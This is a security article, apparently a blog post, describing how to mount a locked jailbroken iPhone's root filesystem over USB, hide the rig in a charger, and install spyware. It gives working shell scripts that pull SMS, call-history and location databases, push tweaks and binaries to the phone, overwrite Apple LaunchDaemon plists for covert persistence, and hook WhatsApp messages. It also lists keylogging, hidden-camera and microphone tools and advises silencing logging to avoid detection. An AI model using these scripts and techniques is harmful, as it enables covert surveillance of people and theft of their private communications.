
iPhone Espionage

There is a misconception that an iPhone is protected by its passcode. This is true for non-jailbroken iPhones, but not for jailbroken ones. It is possible to get root access to the file system of a jailbroken iPhone using the tools from libimobiledevice.org even while the phone is locked and protected by the PIN. This appears to be related to the way lockdownd behaves after an iPhone is jailbroken, and it has been around since the iPhone 3GS days, judging by the slashdot.org article "iPhones PIN-Based Security Transparent to Ubuntu" published in May 2010: http://apple.slashdot.org/story/10/05/27/1826207/iphones-pin-basedsecurity-transparent-to-ubuntu

All the attacker needs is about 3 seconds with your phone and a USB cable. It can take less than 3 seconds depending on the speed of the computer and on whether the attack has been staged in advance. This looks like an awesome attack vector, but it is only viable if you have physical access to the iPhone, or if you can social-engineer the victim into connecting the iPhone to an embedded device (e.g. a mobile charger). Root access to the file system means the attacker can view and extract confidential data from the iPhone: emails, SMS, photos, cookies, basically everything on the device.

That leaves one problem: how do we get our spy tools and binaries to run on the iPhone at startup? Normally, to register an executable to run at startup, you would run a command such as

    launchctl load /System/Library/LaunchDaemons/com.apple.system.plist

However, since we do not have command-line access to the device, we cannot use this method. We need an alternative way to get our binaries to run in the background when the iPhone starts.

Proof of Concept Spy Tools


There are a couple of proof-of-concept tools that I have made, with the help of examples found on the internet, which can be used as a baseline and modified for espionage use. The source code and binaries of the tools can be found at https://github.com/milo2012/iPhone-Espionage

Tool Name           Purpose

kbhook2             Captures keystrokes from the iPhone keyboard and saves them to a text file.
location1           Captures GPS coordinates in the background.
sms1                Captures incoming SMS and forwards them to another mobile number.
takePicture         Activates the iPhone front camera in the background, takes a photo and saves it in the /tmp folder.
screenCapture       Takes a screenshot of the current iPhone screen so that we can monitor what the user is doing.
mic1                Activates the iPhone microphone and records a 30-second clip.
whatsapp1           Intercepts incoming and outgoing WhatsApp messages and forwards them to an email address.
demoScreenCapture1  Demo program showing that screenCapture can be automated to capture every screen of a particular iPhone application. Coupled with kbhook2, it is possible to get screenshots of the emails a user is browsing in an enterprise email application that advertises data encryption and security.

Shrinking the Platform


However, connecting the target's iPhone to a computer and running the script would attract too much attention. We can reduce suspicion by shrinking the whole attack environment to the size of your palm. There are a number of small hardware devices that support Linux, and Debian in particular; a few of interest are the Raspberry Pi, BeagleBoard, Nokia N900 and the Openmoko FreeRunner. Alternatively, you can conceal the device in the form of a USB charger or a mobile charging station. Brian Markus and Joseph Mlodzianowski demonstrated this at DEF CON 19 in Las Vegas in 2011; a write-up can be found at http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/

A mobile charging station found in Bangkok, Thailand

Summary of Steps

Below is a summary of what you need to do.

1. Install Debian/Ubuntu on the embedded device.
2. Install the prerequisites using the script setupPrerequisites.sh from https://github.com/milo2012/iPhone-Espionage/tree/master/evil_gf_attack
3. Download scanUSB.sh from https://github.com/milo2012/iPhone-Espionage/tree/master/evil_gf_attack and copy it to /tmp1/ on your embedded device.
4. Modify scanUSB.sh.
5. Run the command update-rc.d -f /tmp1/scanUSB.sh start 99 2 3 4 5
6. Reboot the device and plug in your iPhone via the iPhone USB cable.
7. Wait for the magic to happen.

One caveat on step 5: on Debian, update-rc.d takes the name of a script that lives in /etc/init.d (not an arbitrary path) and older versions require the runlevel list to be terminated with a ".", so if the command is rejected, copy or symlink the script into /etc/init.d first and check the update-rc.d(8) syntax for your release.

Installing the Prerequisites


You will need to install the prerequisites below on a Debian/Ubuntu system (run as root). Alternatively, download the script from https://github.com/milo2012/iPhone-Espionage/raw/master/evil_gf_attack/setupPrerequisites.sh and save yourself some trouble.

    apt-get install -y libusb-dev usbmuxd libusbmuxd-dev libimobiledevice-dev libimobiledevice-utils libplist-dev libgnutls-dev libxml2-dev libreadline5-dev libgcrypt-dev libglib2.0-dev libfuse-dev libgtk2.0-dev libnautilus-extension-dev libzip-dev build-essential make automake autoconf libtool gcc python-dev git intltool
    mkdir /tmp1 && cd /tmp1
    git clone https://github.com/mcolyer/libiphone.git
    cd /tmp1/libiphone && ./autogen.sh && ./configure && make && make install
    cd /tmp1 && git clone https://github.com/mcolyer/ifuse.git
    cd /tmp1/ifuse && ./autogen.sh && ./configure --prefix=/ && make && make install
    cd /tmp1 && wget http://www.libimobiledevice.org/downloads/ideviceinstaller-1.0.0.tar.bz2
    bunzip2 -d ideviceinstaller-1.0.0.tar.bz2 && tar xvf ideviceinstaller-1.0.0.tar
    cd /tmp1/ideviceinstaller-1.0.0 && ./configure && make && make install

Note that autogen.sh, configure and make must be run from inside each source directory; libiphone and ifuse are the older libimobiledevice forks by mcolyer, and ifuse is installed with --prefix=/ so the binary ends up in /bin.

Modifying the Script


The main tool that does the magic is iFuse. iFuse takes care of mounting the iPhone's root filesystem in Linux; the command that does the trick is ifuse $mountPath --root (the --root option requires a jailbroken device with the AFC2 service installed). I have written a script which, when run, monitors USB connections looking for an Apple device. When an Apple device is connected, it mounts the root filesystem and copies out predetermined databases such as the Google Maps cache, the call history, the SMS database and the cell-tower location database. The script also extracts device information and the list of installed applications on the iPhone, all in a matter of seconds. You can also uncomment some lines in the script to copy spy tools to the iPhone and have them executed either at startup or at a specific time of day.

The script can be found at https://github.com/milo2012/iPhone-Espionage/blob/master/evil_gf_attack/scanUSB.sh

If you want to hook directly into the functions of an iPhone application, as I did with WhatsApp, you need what is called an iPhone tweak (a dynamic library that MobileSubstrate injects into the target process). Copy the binary, together with its filter plist (see Developing an iPhone Tweak below), to /tmp1/TransferDynLibraries so that it is copied to /Library/MobileSubstrate/DynamicLibraries when scanUSB.sh detects an iPhone being connected. If you want something to run in the background on the iPhone at all times or at specific times, you need what is called an iPhone tool: copy the binary to /tmp1/TransferStartup so that it is copied to /usr/bin on the iPhone when the script runs.
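The following is an added example of the scanUSB.sh approach described above and the staging directories just mentioned; it is not the script from the repository. It uses only commands that ship with libimobiledevice-utils and ifuse (idevice_id, ideviceinfo, ideviceinstaller, ifuse --root, fusermount). The list of artefact paths, the output directory layout, and the function names are assumptions for illustration; the database locations vary between iOS versions.

```shell
#!/bin/sh
# Added example (not the author's scanUSB.sh): poll for an Apple device with
# idevice_id, mount its root filesystem with ifuse --root, pull a fixed list
# of databases plus device info and the app list, and push staged payloads in.

# Files to pull, relative to the mounted root. Assumed iOS 4/5-era locations.
ARTIFACTS="private/var/mobile/Library/SMS/sms.db
private/var/mobile/Library/CallHistory/call_history.db
private/var/root/Library/Caches/locationd/consolidated.db
private/var/mobile/Library/Caches/MapTiles/MapTiles.sqlitedb"

# Staging directories on the embedded device (names taken from the article).
DYLIB_STAGE="${DYLIB_STAGE:-/tmp1/TransferDynLibraries}"
TOOL_STAGE="${TOOL_STAGE:-/tmp1/TransferStartup}"

# copy_artifacts <mounted_root> <outdir>: copy every listed file that exists,
# preserving its path under <outdir>; print the number of files copied.
copy_artifacts() {
    root="$1"; out="$2"; n=0
    for rel in $ARTIFACTS; do
        if [ -f "$root/$rel" ]; then
            mkdir -p "$out/$(dirname "$rel")"
            cp "$root/$rel" "$out/$rel"
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# push_payloads <mounted_root> <dylib_stage> <tool_stage>: copy staged tweaks
# (dylib + filter plist) into MobileSubstrate's DynamicLibraries directory and
# staged tools into /usr/bin on the device; print the number of files pushed.
push_payloads() {
    root="$1"; dstage="$2"; tstage="$3"; n=0
    mkdir -p "$root/Library/MobileSubstrate/DynamicLibraries" "$root/usr/bin"
    for f in "$dstage"/*; do
        [ -f "$f" ] || continue
        cp "$f" "$root/Library/MobileSubstrate/DynamicLibraries/" && n=$((n + 1))
    done
    for f in "$tstage"/*; do
        [ -f "$f" ] || continue
        cp "$f" "$root/usr/bin/" && chmod 755 "$root/usr/bin/$(basename "$f")" && n=$((n + 1))
    done
    echo "$n"
}

# wait_for_device: block until idevice_id lists a device; print its UDID.
wait_for_device() {
    while :; do
        udid="$(idevice_id -l 2>/dev/null | head -n 1)"
        if [ -n "$udid" ]; then echo "$udid"; return 0; fi
        sleep 1
    done
}

# dump_device <outdir>: mount the root FS (jailbroken device with AFC2 needed),
# pull artefacts and device info, push payloads, unmount.
dump_device() {
    out="$1"; mnt="$(mktemp -d)"
    mkdir -p "$out"
    if ! ifuse --root "$mnt"; then rmdir "$mnt"; return 1; fi
    copy_artifacts "$mnt" "$out" > "$out/pulled.count"
    ideviceinfo > "$out/ideviceinfo.txt" 2>/dev/null
    ideviceinstaller -l > "$out/apps.txt" 2>/dev/null
    push_payloads "$mnt" "$DYLIB_STAGE" "$TOOL_STAGE" > "$out/pushed.count"
    fusermount -u "$mnt"; rmdir "$mnt"
}

# Watch loop, only when started as: sh scanusb_example.sh --watch /tmp1/loot
if [ "${1:-}" = "--watch" ]; then
    while :; do
        udid="$(wait_for_device)"
        dump_device "${2:-/tmp1/loot}/$udid-$(date +%Y%m%d%H%M%S)"
        # wait until this device is unplugged before polling for the next one
        while idevice_id -l 2>/dev/null | grep -q "$udid"; do sleep 1; done
    done
fi
```

The pull and push steps are separate functions that take the mounted root as a parameter, so they can be exercised against an ordinary directory tree without a device; the watch loop is the only part that needs real hardware.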

iPhone Daemons
Daemons are system processes that run in the background and are started when the iPhone boots. If we want to run our spy tool at startup or at certain times of day, we need to identify the plist of a non-essential daemon to overwrite. A number of daemons registered on the iPhone by Apple seem fairly safe to delete or replace for the purpose of running our own malicious binaries. The list of daemons that are safe to delete or replace includes, but is not limited to:

com.apple.iqagent.plist
com.apple.mobile.profile_janitor.plist
com.apple.chud.chum.plist
com.apple.DumpPanic.plist
com.apple.ReportCrash.(*).plist
com.apple.CrashHouseKeeping.plist
com.apple.aslmanager.plist
com.apple.syslogd.plist
com.apple.powerlog.plist
com.apple.stackshot.server.plist
com.apple.chud.pilotfish.plist

Replacing an existing plist instead of adding a new one makes the change slightly harder to detect, since normal users do not check the contents of LaunchDaemons. Bear in mind, though, that replacing com.apple.syslogd or the ReportCrash entries also silences system logging and crash reporting on the device, which is itself noticeable to anyone who does look.

Modifying the Launch Daemons


A LaunchDaemon plist offers three launch options of interest:

1. Run at load (the RunAtLoad key)
2. Run at load and launch only once (RunAtLoad together with LaunchOnlyOnce)
3. Start at a certain interval (StartCalendarInterval or StartInterval)

To stay under the radar I would choose the third option, as options 1 and 2 would slow the iPhone down noticeably during startup. Below are the contents of an original com.apple.CrashHousekeeping.plist.

Below are the contents of a modified com.apple.CrashHousekeeping.plist which calls our malicious binary /usr/bin/sql2. I have configured the daemon to run daily at 4:01 am.
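Since the original and modified plist files are not reproduced on this page, here is an added example (not the author's file) that generates a LaunchDaemon plist for any of the three launch options listed above and writes it over the chosen daemon's plist in a mounted root filesystem. The label, program path and time are the ones the text names (com.apple.CrashHousekeeping, /usr/bin/sql2, 04:01); the function names and the mode words "load", "once" and "interval" are assumptions for illustration.

```shell
#!/bin/sh
# Added example: build a launchd daemon plist from the shell and install it
# into a mounted iPhone root filesystem. Not the author's modified plist.

# make_daemon_plist <label> <program> <mode> [hour] [minute]
#   load     - RunAtLoad (option 1): started every time launchd loads it
#   once     - RunAtLoad + LaunchOnlyOnce (option 2): started once, not restarted
#   interval - StartCalendarInterval (option 3): started daily at hour:minute
make_daemon_plist() {
    label="$1"; program="$2"; mode="$3"; hour="${4:-4}"; minute="${5:-1}"
    case "$mode" in
        load)
            trigger="  <key>RunAtLoad</key>
  <true/>" ;;
        once)
            trigger="  <key>RunAtLoad</key>
  <true/>
  <key>LaunchOnlyOnce</key>
  <true/>" ;;
        interval)
            trigger="  <key>StartCalendarInterval</key>
  <dict>
    <key>Hour</key>
    <integer>$hour</integer>
    <key>Minute</key>
    <integer>$minute</integer>
  </dict>" ;;
        *)
            echo "unknown mode: $mode" >&2; return 1 ;;
    esac
    # Unquoted heredoc so $label, $program and $trigger are expanded.
    cat <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>$label</string>
  <key>ProgramArguments</key>
  <array>
    <string>$program</string>
  </array>
$trigger
</dict>
</plist>
EOF
}

# install_daemon_plist <mounted_root> <plist_file_name> <label> <program> <mode> [hour] [minute]
# Overwrites the chosen Apple daemon's plist under /System/Library/LaunchDaemons
# of the mounted root; launchd loads everything in that directory at boot.
install_daemon_plist() {
    root="$1"; file="$2"; shift 2
    dir="$root/System/Library/LaunchDaemons"
    mkdir -p "$dir"
    make_daemon_plist "$@" > "$dir/$file"
}

# Usage against a root mounted with ifuse --root at /mnt/iphone:
#   install_daemon_plist /mnt/iphone com.apple.CrashHousekeeping.plist \
#       com.apple.CrashHousekeeping /usr/bin/sql2 interval 4 1
```

Keeping the original Label lets the replaced entry blend in with the rest of the directory listing; the only visible difference is the program path and the trigger keys.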

Developing an iPhone Tweak


In the example below I will show how easy it is to develop an iPhone tweak that intercepts incoming and outgoing messages in WhatsApp. Many iPhone applications ship with debug logging enabled so that users can report bugs to the software company.

Connect your iPhone to your Mac, start Xcode and launch the Organizer to watch the device console. The debug messages are invaluable to us because they tell us which class and method to hook, which makes the development work much easier. THEOS is a very useful tool by Dustin L. Howett that makes jailbroken iPhone development much easier than using Xcode alone. The installation guide for THEOS can be found at http://iphonedevwiki.net/index.php/Theos/Getting_Started

You will need the following:

1. Mac with Snow Leopard or Lion and Xcode
2. Jailbroken iPhone
3. THEOS
4. Crackulous from Cydia
5. WhatsApp
6. Class-Dump (http://www.codethecode.com/projects/class-dump/)

What you need to do


1. Install THEOS.
2. Run Crackulous on the iPhone and select WhatsApp.
3. SCP the cracked version of WhatsApp from your iPhone to your Mac. It should be stored in the /private/var/root/Documents/Cracked/ folder on the iPhone.
4. Unzip the decrypted ipa file.
5. Navigate to Payload > WhatsApp.app.
6. Open Info.plist.
7. Take note of the Bundle Identifier.
8. mkdir Headers
9. Run class-dump -H WhatsApp -o Headers/
10. In Headers/XMPPConnection.h you should see a method called processIncomingMessages:(id)arg1
11. After installing THEOS, navigate to /opt/theos/bin
12. Run sudo ./nic.pl
13. Select option 5 for Tweak.
14. Key in a project name.
15. cd <ProjectName>
16. Edit Tweak.xm and fill in the details below. What the code does is hook the processIncomingMessages:(id)arg1 method of the XMPPConnection class. The %log directive logs information about the call (class, method name and arguments) to the system log, and the %orig directive calls the original method with the original arguments.
17. Edit <projectname>.plist and replace its contents with the information below.
18. Run make
19. Go to the obj folder and copy <projectname>.dylib to /Library/MobileSubstrate/DynamicLibraries on your iPhone.
20. Alternatively, run export THEOS_DEVICE_IP=XX.XX.XX.XX followed by make package && make install to install the dylib on your iPhone via SSH.
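As an added example for steps 16 to 20 (this is not the author's tweak source, which is not reproduced on this page), the shell script below writes the two files a THEOS tweak project needs for the hook described above and runs the build and install commands. The "(void)" return type, the function names and the bundle identifier passed in are assumptions: take the real return type from Headers/XMPPConnection.h and the bundle identifier from WhatsApp.app/Info.plist.

```shell
#!/bin/sh
# Added example: populate a THEOS tweak project (created with nic.pl) with a
# Logos hook on XMPPConnection and build/install it. Not the author's code.

# write_tweak_sources <project_dir> <bundle_id>
# <project_dir> is the directory nic.pl created; its basename is the project
# name, which THEOS also uses for the MobileSubstrate filter plist file name.
write_tweak_sources() {
    dir="$1"; bundle="$2"; name="$(basename "$dir")"
    mkdir -p "$dir"

    # Tweak.xm in Logos syntax: %hook opens the class, %log writes the method
    # name and arguments to the system log, %orig calls the original method.
    # Quoted heredoc so the % directives are written literally.
    cat > "$dir/Tweak.xm" <<'EOF'
%hook XMPPConnection
/* return type assumed; check Headers/XMPPConnection.h from class-dump */
- (void)processIncomingMessages:(id)arg1 {
    %log;
    %orig;
}
%end
EOF

    # <project>.plist: MobileSubstrate filter so the dylib is only injected
    # into the WhatsApp process, not into every process on the device.
    cat > "$dir/$name.plist" <<EOF
{ Filter = { Bundles = ( "$bundle" ); }; }
EOF
}

# build_and_install <project_dir> <device_ip>
# Steps 18-20: make, then let THEOS package and install over SSH. Only runs
# when the Makefile generated by nic.pl is present.
build_and_install() {
    dir="$1"; ip="$2"
    [ -f "$dir/Makefile" ] || { echo "no THEOS Makefile in $dir" >&2; return 1; }
    ( cd "$dir" && THEOS_DEVICE_IP="$ip" make package install )
}

# Usage (after nic.pl, option 5 "Tweak", project name whatsapp1):
#   sh tweak_example.sh ~/whatsapp1 <bundle identifier from Info.plist> 192.168.1.10
if [ $# -eq 3 ]; then
    write_tweak_sources "$1" "$2" && build_and_install "$1" "$3"
fi
```

Without the filter plist MobileSubstrate has no bundle restriction for the dylib, so the plist is not optional; the test below only checks the generated files and confirms that the build step refuses to run when no THEOS Makefile is present.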

Conclusion
Are you allowing jailbroken iPhone devices in your organization? How are you managing these mobile devices, and are you able to ensure their integrity and that they have not been compromised? The author of this article can be contacted at keith.lee2012[at]gmail.com, via Twitter @keith55 or via his blog at http://milo2012.wordpress.com
